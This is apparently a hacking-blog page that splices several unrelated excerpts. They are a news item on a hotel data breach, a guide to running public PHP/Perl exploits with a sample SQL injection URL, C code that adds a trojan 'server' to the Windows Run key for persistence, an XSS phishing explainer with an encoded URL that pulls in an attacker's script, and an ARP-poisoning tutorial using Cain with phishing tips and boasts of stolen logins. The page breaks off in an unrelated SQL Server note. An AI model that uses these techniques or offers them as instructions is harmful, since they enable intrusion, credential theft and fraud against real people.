LONDON: An unknown Indian hacker is being charged with the greatest cyber-heist in history for allegedly helping a criminal gang steal identities of an estimated eight million people in a hacking raid that could ultimately net more than 2.8 billion pounds in illegal funds.

An investigation by Scotland's Sunday Herald newspaper has discovered that late on Thursday night a previously unknown Indian hacker successfully breached the IT defences of UK's Best Western Hotel group's online booking system and sold details of how to access it through an underground network operated by the Russian mafia.

There are no details yet on how the hacker was identified to be an Indian and if a probe is on to identify the person. It is also not known if the hotel chain has alerted the police about the heist.
The attack scooped up the personal details of every single customer that has booked into one of Best Western's 1312 continental hotels since 2007. Amounting to a complete identity-theft kit, the stolen data includes a range of private information including home addresses, telephone numbers, credit card details and place of employment.

"They've pulled off a masterstroke here," said security expert Jacques Erasmus, an ex-hacker who now works for the computer security firm Prevx.

"There are plenty of hacked company databases for sale online but the sheer volume and quality of the information that's been stolen in the Best Western raid makes this particularly rare. The Russian gangs who specialise in this kind of work will have been exploiting the information from the moment it became available late on Thursday night. In the wrong hands, there's enough data there to spark a major European crime wave."

Read more >>

There are mainly three different types of exploits that are used on the internet. PHP, Perl and Web Based attacks.
PHP and Perl attacks are run on the persons computer through an interpreter - a program that reads the code and runs the output. These are usually powered by an underlying SQL or XSS attack.

The other type of attack is a plain web based attack, usually a SQL injection or an XSS exploit with no PHP or Perl powered frontend. These are the easiest to do, but the hardest to figure out how to use as there is not a definitive way of executing them.

General Information

Operating Systems
The most widely used OS is Windows and to be honest I hate it. But I use it. But it is very hard to hack with as tools are not really created for it in mind. Because of that I recommend Linux as a hacking OS because everything just works. .
Oh, yeah, did I mention its free?

PHP
PHP (PHP: Hypertext Preprocessor) is a computer scripting language, originally designed for producing dynamic web pages. It is mainly used in server-side scripting, but can be used from a command line interface or in standalone graphical applications.
Yes, that's from Wikipedia. But its helpful and might be interesting.
But PHP is a very useful and powerful programming language which is used for diverse projects. Because its powerful yet simplistic its used for hacking. And, of course, its free.

How To Spot a PHP Exploit
A PHP exploit is always encased in tags.

Perl
Perl is a dynamic programming language created by Larry Wall and first released in 1987. Perl borrows features from a variety of other languages including C, shell scripting (sh), AWK, sed and Lisp. Perl was widely adopted for its strengths in text processing and lack of the arbitrary limitations of many scripting languages at the time.
Yes, thats from Wikipedia too. But Perl too is a powerful yet simplistic language, like PHP. And its free as well

How To Spot a Perl Exploit
They always start with

#!/usr/bin/perl

Executing Exploits:

Web Based:
These attacks differ hugely so the easiest thing to do is to read the NFO when using this kind of attack.
They usually come in the format

http://www.xxx.org/view.php?id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6,7,8,9,10,11,12/*

The example is a SQL injection but XSS attacks looks very similar. All text after the view.php? is the sploit. The exploit occurs in the way that the PHP handles the information being sent by the HTML.
To use these you just paste everything from http://www.xxx.org/ into the browser address bar while on the vulnerable page of the website.
For example: I am on the forums of a website at www.somewebsite.org/forums/. I know the exploit is in the format above. But, I know that the venerable part of the site is in the /forums/ sub directory so I paste the exploit there:

www.somewebsite.org/forums/view.php?id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6,7,8,9,10,11,12/*

You can take this principle and apply it to XSS exploits as well.

To be a script you do not need to know SQL, but if you want to develop your own exploits it helps a great deal. Look here for more information: http://www.w3schools.com/sql/default.asp

PHP on Windows:
To run PHP on Windows, you need the PHP software. The is open source so free to download.
http://www.php.net/downloads.php
Download the latest version of the Windows binary installer and the zipped folder.

Run the installer, install it into C:PHP, choose not to configure a web server. Next, open the zip, extract everything into the same folder. Rename php.exe to php2.exe or php.exe.bak. Now copy the php.exe from the C:PHPCLI folder to C:PHP.

Right-click My Computer and pick properties. Click the Advanced tab, then the Environment Variables at the bottom. In the second list-box youâ??ll see a line for PATH. Double-click it and add to the end of the existing line â??;C:PHPâ?? This should give you something like:
Code:

C:WINDOWSsystem32;C:WINDOWS;C:WINDOWSSystem32Wbem;
C:Program FilesCommand;C:PHP

Click OK.

Now open a Command Prompt and type the following lines:

ASSOC .php=PHPScript
FTYPE PHPScript="C:PHPPHP.EXE" "%1" %*

You can now just type a PHP script name to run it like an EXE in Command Prompt. No need to type PHP first. For example:
Code:

C:>phpscript.php

Now you have got PHP environment set up save the exploit to your computer as a .php file. The easiest way to do this is to paste everything from the into notepad. Then File -> Save as and save as type All Files. then in the file name type exploit.php.

Read through the php file before running as often you need to define (change) the variables which are used throughout the exploit, such as the website name. These are always at the top of the program and look like:

$target = 'http://localhost/cutenews.1.4.5/search.php';
$username = 'waraxe'; // Username is needed
$outfile = './cute_log.txt';// Log file

The text after the // are comments (apart from the web address). This is so the programmer can give you information about what to do within the source code. Always read these as they give useful information.

Change the text within the '....' to the information relevant to the site that you are exploiting.

Finally you can run it on the command prompt but navigating to the directory that you saved the exploit.php file in.

C:> cd C:/your/dir/goes/here

and then run the exploit

C:/your/dir/goes/here> exploit.php

The output of your exploit, such as passwords, will be shown in the command prompt.

Your done

PHP on Linux (Debian/Ubuntu):
Firstly, become root. Then install PHP.

apt-get install php5

Then save the exploit as exploit.php to your home directory. The exploit is everything within .

Read through the php file before running as often you need to define (change) the variables which are used throughout the exploit, such as the website name. These are always at the top of the program and look like:

$target = 'http://localhost/cutenews.1.4.5/search.php';
$username = 'waraxe'; // Username is needed
$outfile = './cute_log.txt';// Log file

The text after the // are comments (apart from the web address). This is so the programmer can give you information about what to do within the source code. Always read these as they give useful information.

Change the text within the '....' to the information relevant to the site that you are exploiting.

Finally, run the php file.

php exploit.php

The output of your exploit, such as passwords, will be shown in the command prompt.

Your done

Perl on Windows:
Perl is very similar to PHP in the way that its run, but thanks to good software, it is a lot easier to execute.

Download Strawberry Perl from: http://strawberryperl.com/
Just install and you are able to run perl files by executing on the command line

perl exploit.pl

Read through the perl file before running as often you need to define (change) the variables which are used throughout the exploit, such as the website name. These are always at the top of the program and look like:

$target = "http://localhost/cutenews.1.4.5/search.php";
$username = "waraxe"; #Username is needed
$outfile = "./cute_log.txt2; # Log file

The text after the # are comments (apart from the web address). This is so the programmer can give you information about what to do within the source code. Always read these as they give useful information.

Change the text within the "...." to the information relevant to the site that you are exploiting.

Finally run the exploit by typing into the command line:

perl exploit.pl

The output of your exploit, such as passwords, will be shown in the command prompt below.

Your done

Perl on Linux (Debian/Ubuntu):
Become root and install perl:

apt-get install perl

You are then able to run perl files by executing:

perl exploit.pl

Save the perl exploit to your home directory as exploit.pl.

Read through the perl file before running as often you need to define (change) the variables which are used throughout the exploit, such as the website name. These are always at the top of the program and look like:
Code:

$target = "http://localhost/cutenews.1.4.5/search.php";
$username = "waraxe"; #Username is needed
$outfile = "./cute_log.txt2; # Log file

The text after the # are comments (apart from the web address). This is so the programmer can give you information about what to do within the source code. Always read these as they give useful information.

Change the text within the "...." to the information relevant to the site that you are exploiting.

Finally run the exploit by typing:

perl exploit.pl

The output of your exploit, such as passwords, will be shown in the comemand prompt below.

Read more >>

Ok this one isn't to hard, you just need to learn how to use the registry API functions... I'm not going to go over what the windows registry is, if you don't know i advise you google it Wink.

In the registry there is a (path)key that windows reads, in that key is a list of sub-keys, there values contain file paths which are executed when windows loads, so in order to make our server load on startup we just need to add a sub-key into this key containing the path to our server, make sense Wink.


In order to do this the first thing we need to do is declare an object to hold data for subsequent calls to the registry functions.

// this is the object were use for subsequent registry function calls...
HKEY key1;

Secondly we need to open the Registry path(key) that contains the list of programs that will startup, this being "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun".
Ok this is the code we use to open that registry path(key)

RegOpenKeyEx(HKEY_LOCAL_MACHINE, // the root key we want to open
"Software\Microsoft\Windows\CurrentVersion\Run", // that path(key) we want to open
0, // dont worry about this one, we just leave it null(0)
KEY_SET_VALUE, // the access right we wwant when opening the key
&key1); // our registry object we created ealier, were need for subsequent calls

Ok now we've opened the registry key, we need to create a value in it that contains the full path to our server.

RegSetValueEx(key1, // the registry object we used in the call to RegOpenKeyEx(...)
"Name-Of-Key-To-Create", // the name of the key that will be created
0, // we dont need to use this so we leave it null
REG_SZ, // the type of key were creating, it will hold the path to our server so its a string value
(const unsigned char*)"path to our server", // the value of the key were creating
strlen("path to our server")); // number of letters used in the value of our key

Now all we need to do is close the key we opened and were done Very Happy,
this is simple, code below:

RegCloseKey(key1); // close the key we opened ealier...

Ok i've gone through what we need to do and what functions we need to do to it, but there's one thing i hate, and thats when some ends a tut here, without showing what the finished version would look like... so here's what it should look like if you've done everything correct :D.

int main()
{
HKEY key1;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\Microsoft\Windows\CurrentVersion\Run",0,KEY_SET_VALUE, &key1);
RegSetValueEx(key1, "key-name",0,REG_SZ,(const unsigned char*)"path to my server",strlen("path to my server"));
RegCloseKey(key1);

return 0;
}

and there ya have it, a simple method to make your server run on startup Wink. If you can think of any ways to improve this tutorial let me know Wink, hopefully your learned something from this tut Smile, any questions just reply and ill be happy to answer them, peace out, KOrUPt.

Read more >>

Phishing schemes are about to get a whole lot easier. Targeted attacks are much more likely to work now than ever before. Cookies stored on your computer can be retrieved by bad guys half a world away. Even big search engine companies like Google and Yahoo are shaking in their boots. What happened? The bad guys have discovered Cross-Site Scripting (XSS) and the Internet has sudden become a lot more dangerous. (updated with screen shots)

Through the magic of Cross-Site Scripting (XSS) even professional security people will have a hard time recognizing a phishing message. XSS also allows for the theft of cookies, and thus personal information and possibly passwords, stored on your computer. XSS may also have a detrimental affect on public search engine results and the trust we put in search results. This and much more is covered in this article. We've tried to boil things down so the subject is easy to understand. At the same time several examples are given showing just how bad XSS can be. Hopefully by the end of this article you'll have a much better understanding of XSS and why its something deserving of your attention.

Originally I had a hard time getting my arms around the whole XSS issue. Though the problem has been around for at least 10 years I, like many security people, didn't pay real close attention until recently. At first I didn't exactly understand the problem. Even after I saw some examples I didn't immediately see where this could cause much harm. Most of the examples simply popped up an alert box. Big deal. But I knew there was more to it because some people I really trust (or at least think are smart) were very worried. According to new figures from Mitre, a U.S. government-funded research organization XSS is now the #1 application vulnerability being reported. It has surpassed buffer overflows, SQL injections, directory traversals, even Denial of Service vulnerabilities. XSS now accounts for 21.5% of all reported vulnerabilities, rising from just 2% in 2001. This trend is certain to continue as more people become aware of the problem and locate vulnerable applications.

So it was time to develop a better understanding of this problem.

Let me tell you, XSS is very dangerous. If you've heard otherwise don't believe it. Unless you think this is some obscure vulnerability that may not affect you let me assure you this vulnerability is very widespread. People I've spoke with have told me that it takes them about 5-10 minutes to find a new vulnerable site. There are groups out there simply trying to see how many they can find and who can find a vulnerability on the most important websites (so far FBI.GOV and NSA.GOV probably top that list!). They have found (and documented) several banks, law firms, charities, insurance companies, dozens of government agencies, etc., with XSS vulnerabilities. They even found a XSS vulnerability on Acunetix's public website. Acunetix makes a security appliance that is designed to find just such web server vulnerabilities (Acunetix fixed the problem quickly but this serves as an example that any web site can have a XSS vulnerability). Probably hundreds of sites have been found so far and the search is really just beginning.

Unlike most vulnerability testing XSS searching does not modify anything on the remote server and does no harm to the server or the server's data. But as not to encourage phishing attacks based off these finding we will not be posting the actual example links or the full vulnerability address. However, we are aware that there are several sites out there that are posting them. Normally the example links posted on these sites are harmless (and therefore should not get anyone in trouble) but that is no guarantee that you won't stumble across some that are harmful. If you don't know what you're doing don't go to these sites or click on untrusted links. We will, on the other hand, be posting the names of those organizations so that they are pressured to fix the problem. Remember this vulnerability doesn't hurt their server, it hurts everyone else. We suspect the people finding these vulnerabilities are not reporting them to the organization that runs the server. There is still a lot of fear out there that someone will try to charge them with hacking. There is a good chance the vulnerability finders would would prevail in court but nobody wants to go through that, let someone else establish the precedence. But that means the web server administrators might be the last to know that their server is vulnerable and possibly be used for phishing attacks. If you operate web server you should pay attention to the “XSS Hall of Shame” here at NIST.org and the various vulnerability discovery sites that prove a server is vulnerable by including example links. Your company or organization may even be sued if someone falls victim to a XSS enabled phishing attack through your web server. Remember it is your server that allowed this to happen and the URL at the top indicates it is your server hosting the credit card entry form. You are probably especially liable if the problem is public knowledge and you've done nothing about it.

Though the vulnerability is on the server the threat is to the general public, the visitors to that server. Normally servers get exploited and the bad guys either deface the site or use it to load them up with exploit code that can do you harm. Either way web admins have something to work with. In this case nothing bad ever happens to the web server, nothing gets modified on the server, server security hasn't even been breached. It was never actually hacked. Let me explain.

To simplify things we'll use a phishing attack as an example. When the bad guy wants your credit card information one of the most common attacks starts with an email message. They send you an email message with links to some server they control. Both the email message and rogue server are made to look very much like a bank or other financial institute. But usually there are signs that something is wrong. The links in the email message point to an IP address or some domain other than the banks, or your web browser shows the odd address after you click on the link. Instead of the normal 'http://www.normalbank.com' you see something like 'http://192.168.243.205' or 'http://normalbank.c8a45.ru'. Clear signs that something isn't right.

But with XSS the links look fine. Even the address in your browser looks fine. There is nothing apparently wrong. But the key word is 'apparently'. Because with XSS the good server is acting much like a money laundering operation, taking the bad address, cleaning it up so it looks legitimate, and sending it to your browser. All without any changes or exploits to the good server. The fault is with some bit of code that was designed to accept user input. Often times a search form on the good server is what is used in a XSS exploit (remember it is you that is being exploited, not the server). The programmers simply didn't take the time time to filter the user input of Javascript or HTML code and they allowed the original form input to be fed back to the person that entered it without modification. The form input doesn't have to be you entering the text in a block it can often be coded right in to a URL, obfuscated so you don't even know its there. Finding these vulnerabilities isn't even thought to be hacking. Again nothing is compromised on the server, it is doing exactly as it was designed to do. It was just designed poorly. Programmers search for code syntax on the Internet all the time, who would have thought that simply searching for it could cause it to activate back on their own computer. That's just dumb. But other input forms are vulnerable as well, not just search forms.

So here is how it works in a XSS attack. The bad guy sends you one of those well crafted email messages made to look like it came from your bank (again we'll use 'Normal Bank' with a domain of 'normalbank.com'). The email you receive comes from survey@normalbank.com and looks just like the one's your bank normally sends you, with privacy notices, copyrights, etc. It claims you will get $50 deposited to your account simply by taking an on-line survey. The links on the page all point to your bank's domain and look perfectly legitimate, something like:

http://www.normalbank.com/survey.php?q=%3C%73%63%72 %69%70%74%20%73%72%63 %3D%2F%2F%62%61%64%67%75%79% 73%69%6E%63%2E%6E%65%74%2F%62%61 %64%73%63%72%69%70 %74%2E%6A%73%3E

We've all seen gobbly gook as part of normal looking URL's and that in and of its self is not a clue that something is wrong. The larger the company the more likely the URL's will contain gobbly gook because it is often used to request documents or information from databases. So you click the link and you are brought to a page that looks exactly like one from www.normalbank.com prompting you to login to take the survey and claim your $50. The URL in your browser's address bar looks perfectly legitimate and matches the URL above. You login, take the survey, and you get a big thank you notice saying that the $50 will be deposited to your account in 3-5 days. YIPPIE!

So what's going on here? Well first of all you're not going to have $50 deposited to your account (dang it!). In fact the next time you check your account you'll probably find it contains a lot less money than it should. Embedded in the URL gobbly gook above is a bit of Javascript that is fed to a survey form entry page on www.normalbank.com. The form handler doesn't know what to do with this code so it simply reflects it back to your browser (as odd as that may seem). From your browser's point of view this Javascript apparently is coming from www.normalbank.com because it was just reflected from there. But this small bit of Javascript just loaded a complete page from the bad guys server and you just sent your banking information to their server. All without any indication that something was wrong.

The same method of Javascript reflection can be used by the bad guys to steal cookies stored on your computer. Cookies are small text files that a web server stores on your computer to save 'state' (where you're at or what you are doing) or information that your browser can use from visit to visit to save you time and effort. For example when you order something from a site they may store a cookie on your computer with your mailing addresses so the next time you order something you don't have to reenter that information. They may also store your credit card information that way. Normally only the site that dropped the cookie can retrieve it. But if the site has a XSS vulnerability the bad guy can send you a URL to retrieve that cookie. The URL first hits the legitimate site (again www.normalbankcom) but contains code to load Javascript from a server they control (www.badguys5486.ru). This Javascript contains code to retrieve the www.normalbank.com cookie from your computer and send it to them. Remember the URL looks like its coming from the good server so your browser dutifully retrieves the cookie as instructed.

So how do you avoid being exploited? Since you would have a very difficult time deciphering the URL (ok kids break out your secret decoder rings to see what you've won) all you can really do is never click on links sent to you via email. You've heard this before but most of you continue to ignore that advice. There are bad people all over the world that are much smarter at this than I am and they can send out millions of phishing spam messages. Occasionally there are bad people at good companies that will sell a company's client email list. You are vulnerable and XSS is far too easy to exploit.

The fix isn't an easy one. Unlike most vulnerabilities this isn't something that can be patched by Microsoft. The cause of the problem isn't the operating system or the web browser. Usually the problem is with custom programming code written by experienced and inexperienced programmers alike. All of these separate vulnerable programs will have to be fixed. In some cases a companies search engine appliance will have to be totally replaced if it is no longer supported by the manufacturer. So this problem won't go away quickly. But companies need to act because their servers are making us more vulnerable.

At the beginning of this article I mentioned that this vulnerability can have a negative affect on public search engine results. XSS has the potential to undermine how search engines rank pages, thus listing garbage sites above valuable one's. How? This is another thing that I didn't immediately understand. How can weirdly crafted URL's trick the likes of Google and Yahoo? Most public search engines rank sites higher if they have a lot of inbound links (links from other sites). Many also rank the quality of those inbound links so a link on a page at Time.com is worth a lot more than a link on some kids free MySpace page. With XSS it is possible to create links that appear to be on a vulnerable site's page. We've seen examples of this where text and links seem to be magically added to web pages. Javascript is widely used to create content on pages (this site uses it in some of the sidebar panels) so the search engines have to understand it. Search Engine Optimization (SEO) is big business, companies pay thousands of dollars to get their sites ranked higher. When you feed Google a XSS URL (like the example above) it thinks all the Javascript content from derived from that URL was meant to be delivered from that page. But with XSS you can use foreign XSS to apparently create links on a good server's site that aren't actually there (remember nothing has actually been changed on the server). So a quick way to boost SCO is to find as many XSS vulnerable sites and through the magic of Javascript create links to your site. Yahoo, MSN, Google, etc. will see all of those links from well respected sites and rank your site higher. Now before you run off and do this let me tell you that these public search engine companies are not stupid. They are very aware of this problem and are actively working on fixes. When they find you doing this you will be blacklisted (eg; you may never show up in search results again). They aren't discussing the situation but it is believed that they can currently detect some XSS URL's but not others. If you search for 'XSS SEO' you'll find lots of discussion on blackhat SEO sites, hacker sites, and a few whitehat security sites. But lets hope the search engines get a handle on this soon or they'll be one more thing on the Internet that we've lost faith in.

Targeted attack scenarios:

• You get an email message that appears to be from your stock broker suggesting that you buy stock in Acme War Materials immediately. They claim to have inside information that this company is about to win a huge military contract and the stock will double overnight. There is a link in the email to your brokers site for more information. The page even includes a very nice looking PDF file from an Army contracting office that is awarding the contract to them. The informed and suspicious among us would know they wouldn't be allowed to do this. But a certain percentage of people would jump at the chance to double their money. The bad guy will probably win two ways here. The first way is that they'll include a login on their bogus page and will capture your brokerage account info. The second way they'll make money is they'll take out options on that stock ahead of time to sell at a set price. When this stock goes up in value they make money. Our spam honeypot already captures dozens of spam messages per day promoting junk stocks.
• You get an email message from a U.S. Government agency that works in disaster relief. The message says that though they are currently helping hundreds of displaced children the money allocated by Congress is not nearly enough. The eMail message points to a web page on the goodserver.gov website with pictures of hungry children and a form for you to donate money with your credit card. All addresses and links appear to be from the goodserver.gov website. Again, a lot of people would know that the government wouldn't solicit donations this way. But many people would fall for it. What if the email and web address came from a legitimate save-the-starvingkids.org web address would that make people less suspicious? Timed to occur soon after a disaster the response rate to such an email would be very high. We've had reports of several such vulnerable government sites and charity sites that could be used this way.
• You get an email from your state's tax office with your full name and street address in the message saying that you have been audited. The link on the page takes you to http://www.state.yy.us (the 'yy' being your states abbreviation and is legitimate). It asks you to login with your name (with the block already filled in for you. How convenient), and the password is your social security number. The page that comes up says that you owe the state a grand total of $23.46 and offers you a chance to avoid a face to face audit by paying up now. You can either mail a check to their legitimate street address or use the oh so convenient credit card form on the page. For less than $25 most people would be glad to avoid a face to face audit and most people would take advantage of the credit card payment method. Now they own your social security number and your credit card number. Your name, address and email address they got from a bad employee at a store you do business with. This is called a targeted attack and is very effective. Yes, we know of several state web sites with XSS vulnerabilities.

Read more >>

Introduction This paper will lay out for you the basics of an ARP Poison Routing (APR) attack and Man in the Middle (Mitm) attacks. These are very simple attacks, but can be very powerful on unsecured networks. These attacks are so easy I could provide you a walkthrough of how to do this in Cain in about one paragraph, but you wouldn’t learn anything and would become a skiddy.
Before reading this, I suggest you learn a little about networks and the OSI 7-layer model (http://www.webopedia.com/quick_ref/OSI_Layers.asp) and media access control (MAC) addresses, as these attacks take advantage of protocols that work on OSI layers other than what you are usually used to (ie, HTTP on layer 7 and TCP on layer 4, whereas ARP works on layer 2) and do not use only IP addresses for identifying computers.
Address Resolution Protocol:
The Address Resolution Protocol (ARP) is a layer 2 protocol that maps IP addresses to hardware MAC addresses. When a computer wants to find another computer on its network, it uses the ARP to identify where that computer is and how to reach it. There are 9 types of ARP packets, but only 4 are relevant here:

1. ARP – What MAC has this IP address?
2. ARP Response – This MAC has this IP address.
3. RARP – What IP has this MAC address?
4. RARP Response – This IP has this MAC address.

If you are trying to contact a computer on another network (ie, over the internet) then ARP is used to contact your border gateway and route packets to it. The gateway is then responsible for routing the packets to the desire network using IP addresses and various routing protocols instead of ARP. Once the packet has arrived at the correct network, the router that received it will then use ARP again to route the packet around the network to its final destination.
The address resolution protocol works on a stateless broadcast request/single reply communication model. This means when one computer wants to know the address of another; it will broadcast a request for the address across the whole network in the form of What computer is 123.123.123.123? Tell 00:FF:AC:C5:56:3B. The computer that has the IP address of 123.123.123.123 would then send a directed reply, NOT broadcast, saying 90:F5:63:CA:BB:32 has 123.123.123.123. The MAC address in the reply is then added to the local computer’s cache, or if a mapping already exists for either the IP or MAC being used, the cache is updated to reflect this new info. The MAC/IP mapping is then used to route traffic around the network.
ARP Poison Routing (APR)
Now that you know the basics of how ARP works, let’s explore some pitfalls in the protocol. As I’ve said before, ARP is a stateless protocol. This means that each computer does not remember the state of its ARP requests/replies, and thus, does not remember if it sent a request or if it is waiting for a reply or has already received a reply to a previous request. So if we send an ARP reply, the host will accept it and alter its cache accordingly, even if the host didn’t send out a request! So if we send a reply to a target computer saying that our MAC address corresponds to the local gateway’s IP, then any traffic coming out of the target computer bound for the internet will be instead routed to your computer. You can use this to execute a DoS attack and prevent any packets from the target computer reaching the internet or you can sniff the packets for passwords and then pass them on to the real gateway. The second method is a very effective way of getting sensitive information and is fairly undetectable unless the target is monitoring their ARP cache constantly. APR can be setup with either 1-way or 2-way poisoning. 1-way poisoning will only poison the cache of a single target and will only intercept traffic coming from that computer, as shown below:

Figure 1: 1-way APR
2-way poisoning effectively puts your computer directly between 2 target computers so that you can intercept network traffic coming from either host, as shown below:

Figure 2: 2-way APR
Some interesting attacks that can be used with APR include DoS attacks, Network sniffing/Packet stealing, and phishing.
DoS attacks can be accomplished using a 1-way poison and by redirecting traffic from a target computer to a gateway that doesn’t exist so they get ICMP Host Unreachable errors for all their network traffic, or you can redirect it to your computer and simply refuse to forward it to the proper destination. Network sniffing and packet stealing as well as Man in the Middle (Mitm) attacks require a 2-way poisoning scheme. Network sniffing and packet stealing would allow you to steal passwords and hashes that are passed over the network. With the proper filters, you can easily pick out plaintext passwords such as FTP, SMTP, HTTP form data, and hashes such as AIM and Yahoo messenger and SQL. You can even listen in on NetBios sessions and Telnet connections. With some simple phishing filters on your APR tool, you can redirect people from one website to one you control that looks the same where the victim will type in their login info unsuspectingly. This is often useful for grabbing plaintext passwords rather than having to brute force password hashes
One of the greatest hazards to be aware of when using APR is unintentional DoSing of the target or the entire network; because your computer is most likely NOT a dedicated router, and because the packets must travel all the way up the OSI model, be analyzed by your sniffer, then repackaged and sent all the way down the OSI model again, your computer can not handle packet routing as efficiently as a dedicated hardware router. This costs a great amount of time and CPU cycles and slows down the flow of traffic that may end up backing up and DoSing the target, the network, your computer, or any combination of the three. This is a serious issue and should not be taken lightly. If you APR a router on a large network, you may have hundreds of thousands of packets going thru your computer each second. Another hazard that is of interest to hackers is the fact that proxies cannot effectively be used, because ARP and APR works on layer 2 and proxies work on either layer 5 or 7 (depending on the amount of anonymity used) and usually require traveling outside the network to a proxy server. This may seem like a huge safety issue for a hacker, but there is hope! While IP addresses are difficult to spoof over the internet while keeping traffic flowing to and from your computer, both the IP address and MAC address can be effectively altered on a LAN. Many tools exist for changing your MAC and IP during APR attacks. Cain provides an option to do this under the “Configure” menu item.
Man In The Middle (Mitm) Attacks
Mitm attacks include a range of possible attacks, from DoSing, to sniffing, phishing, and rerouting for SE purposes. Mitm is started with a 2-way APR attack that in effect inserts your computer between 2 targets (often a host and a gateway). You can then begin the real meat of the mitm by using customized programs and packet filters to gain the effect you need.
For a simple sniffing attack, a network sniffer such as Ethereal with an IP or MAC filter applied to only capture packets to or from the target is sufficient. For more advanced attacks like password grabbing and phishing, you need more advanced filters. In the case of grabbing passwords, you need to have a filter that disassembles the packet to get to the layer 4 data and above, then scan that data for plaintext passwords or hashes such as HTTP POST or GET data, FTP, SMTP, or SQL login info, or you can use a filter to capture an entire NetBios, Telnet, or VoIP session to record conversations and gather potentially sensitive information. Sometimes it is not always desirable to have a password hash, especially when you can get the plaintext password in less time. This is where phishing comes in. Phishing is the art of constructing a website to look exactly like another, then redirecting traffic from the real site to the one you control in the hopes that no one will notice and will happily type in their real login info, assuming that everything is as it should be. Great care should be taken in conducting a phishing style attack, and I will offer some pointers and methods later on.
Because mitm attacks are built on the back of an APR attack, then all the limitations of an APR attack also apply to a mitm attack. But with the increased complexity of a mitm attack, you must also be aware of further limitations. Using complex filters or packet scanners consumes a lot of CPU cycles and can further increase the risk of unintentional DoSing or breaking of the network. Phishing should be used with care as well, because even the smallest difference between your site and the legitimate one will be noticed by daily users and may raise suspicion.
Phishing
Phishing, as already stated, is making a fake site to fool people into giving you their plaintext passwords and login info. There are several methods for creating a phishing site (phishing lure :D). You can attempt to create your copy site from scratch and code it yourself, but chances are people who use the site regularly would know the difference. Another way would be to copy the source code, images (keeping the directory structure in tact), and any stylesheets, javascripts, or embedded objects, then just make a few small changes to the code. Make sure to change all relative directories to absolute URLs when you do this! If you don’t, a form may not direct to the right page or produce a 404 error or an image may not display right and will raise suspicion. This method produces a site that looks and behaves nearly identically to the original, but because it is still being hosted on another server under a different domain name, observant users may spot the anomaly and report it. For low profile targets, this method is fast and effective. The final method I will discuss is how to do it without making a fake site at all. Because you are executing a mitm attack and have full access to every packet that moves to and from the target, you can create a packet filter that will change the ACTION property of a

tag, so that when the victim clicks the login button, the data will be sent to a site of your choice where you can log the information. This method may be slightly easier to execute, but it will increase the risk of unintentional DoSing due to the processing power required for the filter. No matter what method you choose to use, it is almost always a good idea to take the login info that you received from your fake site and pass it on to the real site to log the user on. This makes your attack more hidden and more difficult to detect. When doing this, make sure to catch errors coming back from the real site in case the user entered an invalid password or username. Then pass this information back to the user. This can be done easily and is no big deal to implement, but failing to do so may raise suspicion and may get you caught.
APR with Cain
Most people think of Cain as a simple password hash cracker, but it is actually much more. It is a very powerful network analyzer and password recovery tool as well as a cracker. It can dump protected storages, sniff network connections, enumerate hosts and users as well as network shares, and can even remotely install the backdoor program Abel. Now, on to the good stuff! I will show you a basic password sniffing mitm attack, but first, I assume you have Cain configured properly for your network card. If not, click the “Configure” menu option and read the help files.
Start up Cain and look at the icons in along the top, just under the menu. The 2 icons we will be concerned with here are the nuclear symbol (the APR icon) and the small circuit board with a red arrow (the sniffer icon). If you are not sure which icons I am talking about, hover your mouse over them and find the icons for “Start/Stop Sniffer” and “Start/Stop APR”. Click the sniffer icon to start the sniffer. Now go to the sniffer tab. The table shown in this tab provides you with information about computers currently on your network and should be blank. If not, clear it by right clicking and selecting “remove all”. The most useful columns right now are the first 4: IP Address, MAC Address, OUI Fingerprint, and Host Name. These should be pretty self explanatory with the exception of the OUI Fingerprint column. When a MAC address is coded into a piece of network hardware, part of the address is used to define the particular computer (like a serial number) and part is used to define the vendor that makes the hardware. Cain has a database of vendors that it checks the MAC address against to discover who made the hardware of that particular host. This is what is contained in the OUI Fingerprint column.
Once the sniffer is started, we need to populate the sniffer tab with host info. Click the “+” button to gather a list of all computers on the current network. If you have Ethereal, you can start that up with “arp” in the filter and watch Cain send out consecutive ARP requests for every IP in your subdomain and watch all the computers respond, freely giving away information about themselves. Once we have a list of possible targets, we need to setup an APR attack. Click on the “Start/Stop APR” icon to start the APR poisoner, then click the “APR” tab at the bottom of the “Sniffer” tab window. There are 2 tables in this tab: the top one is hosts on the LAN that you can directly affect, the bottom table is for computers on the WAN, which, depending on the border router’s settings, may or may not be vulnerable to APR. This list is populated as hosts are discovered thru analyzing packets.
Select the LAN table, and click the “+” icon again. Now select 2 hosts to insert yourself between. After that’s done, sit back and watch the packets roll in. Check the “Passwords” tab on the bottom for various passwords, or the branches under the “APR” symbol on the main APR tab to get HTTPS certificates and other valuable information. The APR-DNS branch can be used in phishing and in redirecting traffic from a website. Well, that’s it. That’s all there is to spying on people’s network traffic when you have access to a computer on the network, which is quite often if you go war-driving behind main street, picking up all the “insekure” business wi-fis
Conclusions
On large or sensitive networks, APR and Mitm can be a very effective way of getting valuable information thru many means, including packet filters and sniffers, phishing, and traffic rerouting. Some of the overall limitations of ARP poisoning are that it cannot cross routers unless they are set up as a single autonomous unit (AU) and are contained in the same subnet. ARP poisoning can be easily thwarted if static caches are being used. Static caches prevent host caches from being updated remotely via the ARP protocol. Some of the interesting things I have actually been able to get from APR and Mitm include:

- Webmail and SMTP logins
- FTP logins to servers running FTPD as root (w00t!)
- FTP logins to websites (pwnt)
- Admin logins to sites
- Student and teacher account logins to my college (I can change their schedules for next year :D)
- AIM convos/hashes and Telnet/SMB/SSH sessions
- Wardriving behind businesses to take over their networks
- Online banking login info and certificates (free moneys!)

Things I’ve learned from my exploits: SECURE YOUR Network! And DON’T do important things on a public network (library, school). You never know when Big Brother is watching
Links, References, and Tools
- Cain
- Ettercap
- Ethereal
- ARPoison
- Dsniff
- Parasite
- WinARPSpoofer
- http://en.wikipedia.org/wiki/ARP_spoofing
- http://www.grc.com/nat/arp.htm

Read more >>

To enable ports initially we have to determine wether the ports are
dynamic or static to do his follow this procedure...

A)How to determine if you are using a static or a dynamic port
If you are not sure if you are using a dynamic port, follow these
steps:1. Click Start, and then click Run.
2. In the Run dialog box, type regedit, and then click OK. This
will start Registry Editor.
3. Locate the HKLM/Software/Microsoft/MSSQLServer/MSSQLServer/
SuperSocketNetLib/Tcp/TcpDynamicPorts registry key. Use this key to
